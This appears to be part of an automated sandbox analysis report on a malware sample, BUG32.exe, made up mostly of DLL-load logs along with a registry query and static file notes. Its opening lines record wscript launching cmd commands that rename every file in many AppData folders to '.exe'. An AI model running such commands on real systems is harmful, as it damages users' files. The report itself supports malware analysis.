    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: propsys.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: edputil.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: urlmon.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: srvcli.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wintypes.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: appresolver.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: bcp47langs.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: slc.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sppc.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: gnsdk_fp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ntmarta.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmvcore.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dwmapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mfperfhelper.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmasf.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mfperfhelper.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmploc.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: atlthunk.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: jscript.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: amsi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: version.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sxs.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: textshaping.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windowscodecs.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msimg32.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: textinputframework.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: coreuicomponents.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: coremessaging.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: coremessaging.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mmdevapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mfplat.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rtworkq.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: audioses.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: powrprof.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: umpdc.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.ui.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windowmanagementapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: inputhost.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: twinapi.appcore.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: netprofm.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: npmproxy.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dataexchange.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: d3d11.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dcomp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dxgi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wtsapi32.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winsta.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: imapi2.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mswmdm.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cewmdm.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmdmps.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: upnp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ssdpapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: linkinfo.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ntshrui.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cscapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: policymanager.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msvcp110_win.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wmpps.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: shsvcs.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.security.authentication.onlineid.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dpapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: onesettingsclient.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: webio.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptnet.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: comppkgsup.dll
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: xmllite.dll
    Source: C:\Users\user\Desktop\BUG32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: BUG32.exeStatic file information: File size 3209216 > 1048576
    Source: BUG32.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2fd400
    Source: Binary string: C:\Users\Guest\documents\visual studio 2015\Projects\Noways\Noways\obj\Debug\Noways.pdb source: BUG32.exe, 00000000.00000003.2028575508.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, BUG32.exe, 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmp
